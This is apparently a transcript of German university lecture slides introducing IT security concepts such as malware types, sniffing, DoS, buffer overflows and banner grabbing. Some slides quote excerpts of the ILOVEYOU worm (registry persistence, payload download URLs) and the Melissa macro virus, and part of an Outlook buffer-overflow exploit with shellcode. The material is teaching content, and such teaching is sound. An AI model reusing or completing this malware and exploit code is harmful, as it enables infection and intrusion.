Übersicht. Grundbegriffe Malware Abhören DoS-Angriffe Bufferoverflow Banner Grabbing. Die Beschreibung einiger Angriffe auf Websites kommt später.

Größe: px
Ab Seite anzeigen:

Download "Übersicht. Grundbegriffe Malware Abhören DoS-Angriffe Bufferoverflow Banner Grabbing. Die Beschreibung einiger Angriffe auf Websites kommt später."

Transkript

1 Übersicht Grundbegriffe Malware Abhören DoS-Angriffe Bufferoverflow Banner Grabbing Die Beschreibung einiger Angriffe auf Websites kommt später. 2

2 Begriffe I Es gibt keine einheitliche Verwendung folgender Begriffe, hier ein Vorschlag: Intrusion (Störung, Verletzung, Eindringen) = Erfolgreicher lesender oder schreibender, aber nicht erlaubter Zugriff auf Daten bzw. Ausführung von Programmen durch organisationsfremde Personen, also von Außen Misuse = Missbrauch = Erfolgreicher lesender oder schreibender, aber nicht erlaubter Zugriff auf Daten bzw. Ausführung von Programmen durch Personen der eigenen Organisation, also von Innen Incident = Zusammenfassender Oberbegriff von Intrusion und Misuse: Vorfall, bei dem etwas Unerlaubtes geschah 3 Begriffe II Angriff = Versuch einer Person, auf nicht erwünschte Weise auf ein System (Hardware/Software/Daten) zuzugreifen und zu benutzen Ein erfolgreicher Angriff ist dann eine "Intrusion" bzw. ein "Incident". Eine andere Definition für Intrusion (NSTAC): "Eine Intrusion ist ein unerlaubter Zugriff auf oder Aktivität in einem Informationssystem". Was erlaubt und was verboten ist, wird durch Policies definiert. 4

3 Trojaner und Back doors Trojaner = Programm(teil), das neben einer offensichtlichen eine versteckte Funktion ausführt Back Doors = Server, die nach Außen Dienste anbieten und dies möglichst versteckt tun Varianten in aufsteigender Gefährlichkeit: 1. Ausblenden von verräterischen Informationen z. B. Weglassen von bestimmten Prozessen beim Kommando zum Auflisten von Prozessen 2. Datenmanipulationen von Konfigurationen 3. Inaktivieren von Authentifizierungen 4. Änderungen des Kernels (auch zur Laufzeit) 5 Würmer Würmer = Programme, die von Rechner zu Rechner - auch Plattform übergreifend kopiert werden und auf jedem Rechner eine Aktion ähnlich den von Viren durchführen Würmer können sich eigenständig verbreiten, z.b. über FTP, oder passiv durch die Menschen transportiert werden (Mail). Aktionen: 1. Verbreitung von Viren 2. Manipulation von Konfigurationen 3. Zerstörung von Daten 4. Installation von Hintertüren oder Rootkits Die Idee zum Begriff des Computer-Wurms stammt aus dem SF- Roman "Der Schockwellenreiter" von John Brunner aus dem Jahre 1975: 6

4 Malware, Spyware und Adware Viele der heutigen Viren sind Würmer mit Virenaktionen. Deshalb wird zwischen ihnen nicht differenziert. Malware = Schadprogramme = Zusammenfassung von Trojanern Back Doors Viren Würmer Spyware Spyware = Software, die Daten über die Benutzung des Rechners sammelt und an Dritte übermittelt oder durch Identifizierung diese Sammlung erst ermöglicht Adware = Zusatzprogramme, die Reklame für fremde oder eigene Produkte darstellen meist mit der Lizenz verknüpft Siehe: 7 Root Kit Rootkit = Sammlung von Programmen, die Teile des Betriebssystems ersetzen, um einen leichten Zugang von außen zu realisieren Komponenten, die ersetzt werden können: Software, die die Basis darstellt (Systemsoftware) Booter Kernel, Kernel-Module auf der Platte Kernel im Arbeitsspeicher Das gesamte System durch Virtualisierung Siehe dazu: Modifikationen des Kernels: Syscalls open(), read() Listen der Prozesstabellen Siehe dazu: 8

5 Techniken - Abhören Sniffer = Programm eventuell zusammen mit Hardware zum Abhören von Kommunikation Beispiele: 1. LAN: Ethernet-Karte in Promiscous-Mode bringen, alle Frames kopieren, filtern und ordentlich aufbereitet anzeigen 2. Nach Einbruch in Router/Firewall: dasselbe auf IP-Ebene am Netzübergang 3. WLAN: Monitoren und Knacken der WEP-Verschlüsselung 4. Messung der Abstrahlung von CRT-Monitoren TEMPEST (Transient Electromagnetic Pulse Emanation Standard), unscharfe Schrift lässt sich schwerer abhören 5. Abhören von Lichtwellenleitern 9 Techniken - In der Mülltonne wühlen Papierabfälle ansehen, Interessant sind Kreditkartenquittungen Kennwortformulare Ausdrucke von Konfigurationsdateien Notizen von Administratoren Internet-Cache vom Vorgänger am PC ansehen, z. B. in Internet-Cafes Auf externen Platten nach gelöschten Dateien suchen Platten von insolventen Firmen durchsuchen(!) 10

6 Techniken - Aktive Inhalte Passive Inhalte = Daten, die nur angezeigt oder kontrolliert modifiziert werden können Aktive Inhalte = Programme als Teile von anderen Daten, die (unkontrolliert) nach dem Laden gestartet werden Beispiele auf der Client-Seite: ActiveX (Zertifikate sagen z.z. nichts über Sicherheit) Plugins JavaScript (HTML, PDF) VBA (Mails), VBScript (web) Java (wohl das sicherste von allen aufgeführten) Dies gilt für Web-Seiten und s gleichermaßen. 11 Abwehrtechnik - Quarantäne Quarantäne = Unklare Software bzw. Daten werden in einen Bereich gebracht, in dem nur kontrollierte und beobachtbare Manipulationen durch die unklare Software möglich sind. Für Quarantäne eignen sich: Besondere Teile in Rechnern Eigene Rechner Eigene Netze mit eigenen Rechnern Beispiele: Virtuelle Maschinen wie z.b. die JavaVM Simulatoren wie VMware, Virtual PC oder XEN In der Quarantäne wird die Software genau getestet und dabei beobachtet. 12

7 Denial of Service (DoS) Denial of Service-Angriff = DoS-Angriff = Eine Funktion oder ein ganzes System wird außer Kraft gesetzt oder so gestört, dass die Dienstleistung nicht erbracht werden kann Beispiele: ICMP: Mitteilung über die Funktionsunfähigkeit bestimmter Router, so dass keine IP-Pakete vermittelt werden können Aufbau des 3-Wege-Handshake ohne das dritte bestätigende Paket Senden vieler sinnloser, aber formal korrekter Pakete zur Beschäftigung Ping of Death Anwendungen bei Web-Server oder Mail-Server 13 Distributed Denial of Service (ddos) Verteilte Version des Denial of Service Ziel: Überlastung durch faches gleichzeitiges Generieren scheinbar sinnvoller Paketsequenzen mit Stationen "Brief-Bomben": Das Ganze mit Probleme Erkennen des ddos-angriffs Eingrenzen der IP-Adressen der beteiligten Stationen Verhindern nach der Erkennung: hier muss mit den Providern zusammengearbeitet werden Auch dies ist ein Grund für die Vorratsdatenspeicherung Oder? 14

8 Mail, SPAM und Hoax Überlastung des Postfachs einer Person durch zu viele oder zu große Mails Vielfaches Senden derselben Mail Eintragen des Opfers in viele Mailing-Listen, z.b. in Derselbe Effekt kann auch durch Spam (Junk Mail) oder durch Hoax entstehen: Spam: Werbe- oder Blabla-Mail harmlos bis hin zum Betrug Hoax: Scherzhafte oder böswillige Warnung vor einer fiktiven (Viren-)Gefahr 15 Viren Virus = Programmstück, das sich an ein anderes Programm anfügt oder teilweise überschreibt und neben seiner Verbreitung eine Aktion durchführt. Verbreitung Suche nach einem nicht infizierten Programm bzw. geeigneten Ort sowie Anfertigen einer eventuell geänderten Kopie von sich selbst. Aktionen (Payload) in aufsteigender Gefährdung: 1. Jux 2. Zerstörung, z. B. Formatieren von Datenträgern 3. Manipulation von Zugriffssystemen 4. Nachladen aus dem Internet bzw. Mutieren 5. Installation fremder Software 16

9 Viren - Orte Dokumente mit aktiven Inhalten, z.b. Word mit VBA PDF mit JavaScript mit JavaScript Dazu: Bootsektor von Medien (CD, DVD) Autostartdateien von Medien (CD, DVD) Ausführbare Programme, z.b. selbst auspackende-archive RAM(!) Einträge in der Registry (Windows) helfen vielen Viren, als Ort für Viren kommen diese Einträge nicht in Frage. 17 Viren - Entfernung Identifizierung mit Mustererkennung (Signaturen) durch Virenscanner Probleme: Aktualität der Signaturbibliotheken Teilweise geht es um Stunden Viren werden meist erst dann entdeckt, wenn sie aktiv wurden "schlafende" Viren sind sehr schwer erkennbar Heuristiken für potentielle Viren sind problematisch. Beim Verbreitungsschritt können Viren ihr Bitmuster variieren (mutieren). Dann sind so viele Signaturen bzw. speziell programmierte Suchroutinen erforderlich wie Mutationen. 18

10 Viren - Infektionsweg Mail Date: Fri, 18 Jan :11: From: Albrecht... [...] Subject: Zuarbeit zu Musical (keine Noten) Content-Type: multipart/mixed; boundary=" " Leerzeile This is a multi-part message in MIME format Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit blah bla blahh Content-Type: application/msword; name="musical_3.6.doc" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="musical_3.6.doc" base64-kodiert Trenner zwischen Attachments 1. Attachment kodiert in ASCII 2. Attachment kodiert in base64 0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAJAAAAAAA AAAAAFQBAAAAAAAAVAEAABQAAAAAAAAAAAAAAGgBAAAAAAAAqAMAAAAAAACoAwAAAAAAAKgD [...] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== Anhänge Jeder Anhang hat einen Typ, der die Gruppe beschreibt, und einen Untertyp, der das Verarbeitungsprogramm oder das spezielle Format beschreibt. Jeder Anhang hat einen eigenen Kopf, der vom Inhalt mit einer Leerzeile getrennt ist. Im Kopf stehen Angaben über die Kodierung, den Typ und den Namen der Datei etc. Diese erfolgen nach dem Schema: <Keyword>: <Wert> 20

11 Beispiele für MIME-Typen Type Subtype Bemerkungen Text Plain Normaler ASCII-Text Text HTML Normaler ASCII-HTML Multipart Mixed Mehrere Anhänge unterschiedlichen Typs Application msword Word-Datei Application Postscript Postscript-Datei (z. B. zum Ausdrucken) Image gif GIF-Datei Image jpeg JPEG-Datei Audio Basic Normale Audio-Datei Video mpeg MPEG-Video Siehe auch: und: 21 MIME-Typen im Firefox 32 und Thunderbird Firefox 32 Thunderbird 31 22

12 Viren II 23 Viren III 24

13 Den Virus haben alle! Siehe: 25 I love you I (Auszug) I rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.opentextfile(wscript.scriptfullname,1) vbscopy=file.readall main() sub main() On Error Resume Next dim wscr,rr set wscr=createobject("wscript.shell") rr=wscr.regread("hkey_current_user\software\microsoft\windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,... end if Set dirwin = fso.getspecialfolder(0) Set dirsystem = fso.getspecialfolder(1) Set dirtemp = fso.getspecialfolder(2) Set c = fso.getfile(wscript.scriptfullname) c.copy(dirsystem&"\mskernel32.vbs") c.copy(dirwin&"\win32dll.vbs") c.copy(dirsystem&"\love-letter-for-you.txt.vbs") regruns() end sub 26

14 I love you I (Auszug) II regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/ ~young1s/hjkhjnwerhjkxcvytwertnmtfwetrdsfmhpnjw gvsdf7679njbvyt/win-bugsfix.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/ ~angelcat/skladjflfdjghkjnwetrydgfikjuiyqwerwe hjk4jnhhgbvbmkljkjhkqj4w/win-bugsfix.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/ ~koichi/jf6trjkcbgrpgqaq198vbfv5hffekbopbdqznmpohfger67b3vbvg/win-bugsfix.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/ ~chu/sdgfhjksdfjklnbmnfgkklhjkqwtuhjbhafsdgjkhyugqwerasdjhphjasfdglknbhbqwegqw iuy7thjg /WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\win-bugsfix.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank" Melissa (Auszug) // Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1-1): Options.VirusProtection = (1-1): Options.SaveNormalPrompt = (1-1) End If... 28

15 HOAX 29 Bufferoverflow Bufferoverflow = Programmierfehler, der dazu führt, dass zu viele Daten in einen Puffer gelesen und dadurch Bereiche dahinter überschrieben werden Beispiel eines Verfahrens: Die Variablen liegen auf dem Stack samt Return-Adresse. Es wird ein Paket konstruiert, das so lang ist, dass die Return- Adresse überschrieben wird An diese Stelle wird eine Adresse geschrieben, die einen Sprung in den Puffer bewirkt. Dort steht beliebiger Code. Irgendwann wird ein Return ausgeführt und damit die manipulierte Return-Adresse benutzt. 30

16 Stack-Aufbau während einer Subroutine I 31 Stack-Aufbau während einer Subroutine II Adresse des Puffers Parameter Rückkehr- Adresse Lokale Variablen Puffer Lokale Variablen <- SP Durch den eingelesenen Block überschriebener Bereich Irgendetwas Sinnvolles Code Situation nach einem read() Inhalt des einzulesenden Blocks 32

17 Outlook Exploit (Auszug) #****************************************************************************** # Exploiteable Buffer Overflow # Outlook Express 5.0 Outlook 2000 Outlook 97.0 Outlook 98 #****************************************************************************** use Getopt::Std; use Socket; getopt('h:m', \%args); # user defined variables if(defined($args{h})){$serv=$args{h}}else{&usage;} if(defined($args{m})){$rcpt=$args{m}}else{&usage;} # These are the escape characters which will cause the seg violation. # *nix didn't like the ascii interpretation, so we send the # characters in hex. # +,1,,^,ñ,z,,x $spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31". "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31". "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31". "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a"; $shellcode = "\xe8\x00\x00\x00\x00\x5d\x81\xed\x40\x10\x40\x00\x81\xc4\x00". "\x03\x00\x00\xb8\x38\x10\x00\x01\x8b\x00\x89\x85\x0b\x11\x40\x00". "\x8c\xc8\xa8\x04\x75\x08\x8b\x85\x1f\x11\x40\x00\xeb\x06\x8b\x85". "\x23\x11\x40\x00\x89\x85\x1f\x11\x40\x00\x8d\x8d\x42\x11\x40\x00". "\x51\x50\xff\x95\x0b\x11\x40\x00\x89\x85\x0f\x11\x40\x00\x8d\x8d". "\x53\x11\x40\x00\x51\xff\x95\x0f\x11\x40\x00\x8d\x8d\x34\x11\x40". "\x00\x51\x50\xff\x95\x0b\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8b". 33 UNIX-Kernel-Hack - UNIX-V6 (ca. 1977) I Auszug (Seite 39) aus J. Lions, UNIX Operating System Source Code Level Six, 2. Ed., University of New South Wales Nov

18 UNIX-Kernel-Hack - UNIX-V6 (ca. 1975) II 35 UNIX-Kernel-Hack - UNIX-V6 (ca. 1975) III 36

19 Smurf-Attacke Es handelt sich um einen DoS-Angriff, der mit Broadcast-Pings versucht ein bestimmtes System zu stören Ablauf: 1. Zusammenbau eines Ping-Paketes 2. Zusammenbau eines IP-Paketes mit Absender-Adresse des Opfers (Spoofing) 3. (Mehrfaches) Absenden des Paketes mit Broadcast-Adresse Folge: Die meisten Systeme schicken ein ECHO Reply an das Opfer, das mit einem Schlag eventuell hunderte von IP-Paketen bekommt Jetzt entscheidet die Implementierungsgüte des TCP/IP-Stacks über Leben und Tod Hierzu werden RAW-Sockets auf der IP-Ebene benötigt, was Root-Rechte erfordert. 37 ICMP - Time Stamp Request Es kann die lokale Uhrzeit - je nach Korrektheit - abgefragt werden. Der Sender fügt seine Zeit ein. Der Empfänger ergänzt den Zeitpunkt des Erhaltens und des Absendens der Antwort. Dies ist für sinnvolle Aufgaben fast nie sinnvoll, weil die Systemuhren fast immer nach dem Mond gehen. Aber gut zum Ausspähen... Format Es sollte das Coordinated Universal Time (UTC)- bzw. Greenwich Mean Time (GMT)-Format sein - ist es nicht immer, was für das Fingerprinting gut ist. Beispiel hping2 --icmp-ts -c XXXX wobei XXXX die IP-Adresse des Empfängers ist 38

20 FTP-Log für Banner Grabbing I Connecting to (ftp.netscape.com) -> IP: PORT: 21 Connected to (ftp.netscape.com) -> Time = 751ms Socket connected waiting for login sequence ftpnscp.newaol.com FTP server (SunOS 5.8) ready. USER anonymous 331 Guest login ok, send your complete address as password. PASS (hidden) 230 Guest login ok, access restrictions apply. SYST 215 UNIX Type: L8 Version: SUNOS FEAT 500 'FEAT': command not understood. REST Restarting at 100. Send STORE or RETRIEVE to initiate transfer. REST FTP-Log für Banner Grabbing II Resolving host name ftp.xyz.de... Connecting to (ftp.xyz.de) -> IP: PORT: 21 Connected to (ftp.xyz.de) -> Time = 10ms Socket connected waiting for login sequence. 220-This is a Linux PC (Dell PE-2650, 2 CPUs P4/2800, 12 GB RAM) 220-running SuSE-Linux-8.2 with SuSE kernel GB-SMP. 220-/pub is ext3, a 2 TB Partition within a Triplestor Masscope+ 220-IDE/SCSI Raid array with 15+1 SATA disks Hitachi 240 GB Raid For questions and other contacts to the ftp-admin, mailto:xyz 220-All transfers are logged. The local time is Thu Nov 18 12:42: Limits: Domains gwdg.de, uni-goettingen.de, mpg.de: 200 sessions 220- Other domains: Mon - Fri 8:00-18:00: 4800 sessions 220- other times: 8192 sessions 220-Your domain limit: 4800 active sessions:

21 Apache-Log für Banner Grabbing II 41 Nach dieser Anstrengung etwas Entspannung... 42

Literatur. Netzwerke WS 2013/14 - Teil 9/IT-Sicherheit I

Literatur. Netzwerke WS 2013/14 - Teil 9/IT-Sicherheit I Literatur [9-1] Mitnick, Kevin; Simon, William: Die Kunst der Täuschung. mitp, 2003 [9-2] Grundschutzhandbuch. https://www.datenschutzzentrum.de/systemdatenschutz/bibliothek/sb1.htm oder https://www.bsi.bund.de/de/themen/itgrundschutz/itgrundschutz_node.ht

Mehr

Netzwerke Teil 9: IT-Sicherheit - Grundlagen

Netzwerke Teil 9: IT-Sicherheit - Grundlagen Netzwerke Teil 9: IT-Sicherheit - Grundlagen 31.10.13 1 Literatur [9-1] Mitnick, Kevin; Simon, William: Die Kunst der Täuschung. mitp, 2003 [9-2] Grundschutzhandbuch. https://www.datenschutzzentrum.de/systemdatenschutz/bibliothek/sb1.htm

Mehr

Rechnernetze. 6. Übung

Rechnernetze. 6. Übung Hochschule für Technik und Wirtschaft Studiengang Kommunikationsinformatik Prof. Dr. Ing. Damian Weber Rechnernetze 6. Übung Aufgabe 1 (TCP Client) Der ECHO Service eines Hosts wird für die Protokolle

Mehr

Intrusion Detection Basics

Intrusion Detection Basics Intrusion Detection Basics Ziele von Angriffen Formen von Angriffen Vorgehensweise von Eindringlingen Überwachungsmöglichkeiten Tools: tripwire, iptraf, tcpdump, snort Ziele von Angriffen (Auswahl) Sport:

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

Viren, Würmer, Trojaner

Viren, Würmer, Trojaner Viren, Würmer, Trojaner Was muss ich beachten? Ralf Benzmüller G DATA Software AG Überblick Einleitung Grundlegende Begriffe Gefahrensituation Zahlen und Daten Trends Infektionsmechanismen Viren Würmer

Mehr

Dienste zur Kommunikation

Dienste zur Kommunikation Dienste zur Kommunikation Die Killer-Applikation des Internet heisst elektronische Post Das grösste verteilte Dokumenten-System des Internet heisst World Wide Web Mit beiden kann man hochgradig produktiv

Mehr

Austausch großer Datenmengen mit externen Partnern

Austausch großer Datenmengen mit externen Partnern FORSCHUNGSZENTRUM JÜLICH GmbH Jülich Supercomputing Centre D-52425 Jülich, Tel. (02461) 61 6402 Beratung, Tel. (02461) 61 6400 Technische Kurzinformation FZJ-JSC-TKI-0350 Ulrike Schmidt 28.05.2009 Austausch

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

Anhang A - Weitere Bibliotheken. Die Bibliothek Mail_02.lib ermöglicht das Versenden von Emails mit dem Ethernet-Controller 750-842.

Anhang A - Weitere Bibliotheken. Die Bibliothek Mail_02.lib ermöglicht das Versenden von Emails mit dem Ethernet-Controller 750-842. Anhang A - Weitere Bibliotheken WAGO-I/O-PRO 32 Bibliothek Mail_02.lib Die Bibliothek Mail_02.lib ermöglicht das Versenden von Emails mit dem Ethernet-Controller 750-842. Inhalt Mail_02.lib 3 MAIL_SmtpClient...

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,

Mehr

DOSNET SMURF ATTACK EVIL TWIN

DOSNET SMURF ATTACK EVIL TWIN DOSNET SMURF ATTACK EVIL TWIN Michael Armstorfer Roland Eisenhuber Mathias Fink ITS2005 / FH-Salzburg / 2007-01-14 DOSNET Gefahrenkategorie Störung Attackenkategorie Art: aktiv Ausgangspunkt: von außen

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

E-Mail. Nachrichtenübertragung. Internetkommunikation Christof Fox. Wie werden Nachrichten Übertragen?

E-Mail. Nachrichtenübertragung. Internetkommunikation Christof Fox. Wie werden Nachrichten Übertragen? E-Mail Nachrichtenübertragung 1 Wie werden Nachrichten Übertragen? Über Protokolle: SMTP (Simple Mail Transfer Protocol) POP3 (Post Office Protocol Version 3) IMAP (Internet Message Access Protocol) 2

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 6. FTP Proxy (Anti Virus) 6.1 Einleitung Sie konfigurieren den FTP Proxy, um den Datentransfer übers Internet zu kontrollieren. Ein FTP Server befindet sich vorkonfiguriert im Internet mit der IP-Adresse

Mehr

Scan-Techniken Ein Überblick

Scan-Techniken Ein Überblick Scan-Techniken Ein Überblick Klaus Möller DFN-CERT GmbH Februar 2002 Agenda Was sind Scans? Scan-Techniken ICMP Scans TCP Scans UDP Scans Weitere Scan-Techniken Umgang mit Scans Was sind Scans? Einbruchszyklus:

Mehr

Aufbau einer Testumgebung mit VMware Server

Aufbau einer Testumgebung mit VMware Server Aufbau einer Testumgebung mit VMware Server 1. Download des kostenlosen VMware Servers / Registrierung... 2 2. Installation der Software... 2 2.1 VMware Server Windows client package... 3 3. Einrichten

Mehr

Network Address Translation (NAT) Prof. B. Plattner

Network Address Translation (NAT) Prof. B. Plattner Network Address Translation (NAT) Prof. B. Plattner Warum eine Übersetzung von Adressen? Adressknappheit im Internet Lösungen langfristig: IPv6 mit 128-bit Adressen einsetzen kurzfristig (und implementiert):

Mehr

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden 1 Angriffsmethoden von Hackern A. Verschiedene Angriffsmethoden 1. IP-Spoofing IP-Spoofing bedeutet das Vortäuschen einer bestimmten IP-Adresse als Absender-Adresse. Er kann Access-Listen von Routern überlisten

Mehr

MALWARE AM BEISPIEL VON STUXNET

MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen. Das Projekt Das Produkt

OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen. Das Projekt Das Produkt OpenSecurity @ OPEN COMMONS_KONGRESS 2014 OpenSecurity Open Source Sicherheitslösungen schützen Angestellte und Daten in öffentlichen Institutionen Das Projekt Das Produkt Nikolaus Dürk, MAS X-Net Services

Mehr

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013

Workshop Sicherheit im Netz KZO Wetzikon. Peter Skrotzky, 4. Dezember 2013 Workshop Sicherheit im Netz KZO Wetzikon Peter Skrotzky, 4. Dezember 2013 Zentrale Fragen! Wie kann sich jemand zu meinem Computer Zugriff verschaffen?! Wie kann jemand meine Daten abhören oder manipulieren?!

Mehr

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen Datenschutz Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen gesetzliche Datenschutzmassnahmen www.datenschutz.ch K4.4 Datensicherheit - Datenschutz

Mehr

POP3 und SMTP live und schwarzweiß

POP3 und SMTP live und schwarzweiß POP3 und SMTP live und schwarzweiß Informatik S2 In diesem Arbeitsauftrag empfangen und senden Sie E-Mails so, wie es auch ein E-Mail- Programm machen würde. Das heißt, Sie benutzen die Protokolle auf

Mehr

Virtualisierung fur Einsteiger

Virtualisierung fur Einsteiger Brochure More information from http://www.researchandmarkets.com/reports/3148674/ Virtualisierung fur Einsteiger Description: Virtualisierung von Grund auf verstehen Für die meisten Administratoren gehört

Mehr

PROsave CTI Client Installation

PROsave CTI Client Installation PROsave CTI Client Installation Inhalt Download Installation TAPI-Gerät "SIP-SoftPhone" konfigurieren Alternatives Beispiel: TAPI-Gerät "snom Line1" konfigurieren Für die Einbindung anderer Telefone oder

Mehr

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen?

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Lange Nacht der Wissenschaften 2007 Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Manuel Selling Humboldt Universität zu Berlin ZE Computer und Medienservice Abt. Systemsoftware und

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

HostProfis ISP E-Mail Einstellungen 1

HostProfis ISP E-Mail Einstellungen 1 E-Mail Einstellungen Konfigurationsanleitungen für folgende E-Mail-Clients: Outlook Express 5 Outlook Express 6 Netscape 6 Netscape 7 Eudora Mail The Bat HostProfis ISP E-Mail Einstellungen 1 Bankverbindung:

Mehr

Computerviren, Würmer, Trojaner

Computerviren, Würmer, Trojaner Computerviren, Würmer, Trojaner Computerviren, Würmer und Trojaner zählen zur Familie unerwünschter bzw. schädlicher Programme, der so genannten Malware. Diese Programme können sich selbst verbreiten und

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr

(Un)Sicheres Windows am Heim-PC

(Un)Sicheres Windows am Heim-PC (Un)Sicheres Windows am Heim-PC Ein Vortrag von Volker Birk mailto:dingens@bumens.org http://www.dingens.org Ich will doch bloß... Surfen Mailen Internet Banking Spielen... W-insecure - das Problem. Viren,

Mehr

Ping of Death Spoofing Phisihing. B. Krbecek (DCP) A. Schempp (DCS, DCP, DCF) T. Schwarz

Ping of Death Spoofing Phisihing. B. Krbecek (DCP) A. Schempp (DCS, DCP, DCF) T. Schwarz Ping of Death Spoofing Phisihing Überblick B. Krbecek -> Ping of Death A. Schempp -> Spoofing -> Phishing Fragen? B. Krbecek Ping of Death (POD) - I Gefahrenkategorie: -> Störung (Disruption) Attackenkategorie:

Mehr

Organisatorisches. Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben

Organisatorisches. Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben Organisatorisches Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben Mittwochs im Netz Vorbesprechung Freitag/Montag in der Übung

Mehr

Webmail. V1.4-14.09.2011 - Christof Rimle 2010 - www.rimle.ch

Webmail. V1.4-14.09.2011 - Christof Rimle 2010 - www.rimle.ch Christof Rimle IT Services, Säntisstrasse 16, CH-9240 Uzwil Webmail V1.4-14.09.2011 - Christof Rimle 2010 - www.rimle.ch Dieses Dokument ist urheberrechtlich geschützt. Es darf von Kunden der Firma Christof

Mehr

Mail Protokolle. ESMTP: Extented SMTP Server gibt Infos über seine Fähigkeiten aus, zb für Verschlüsselung verwendet

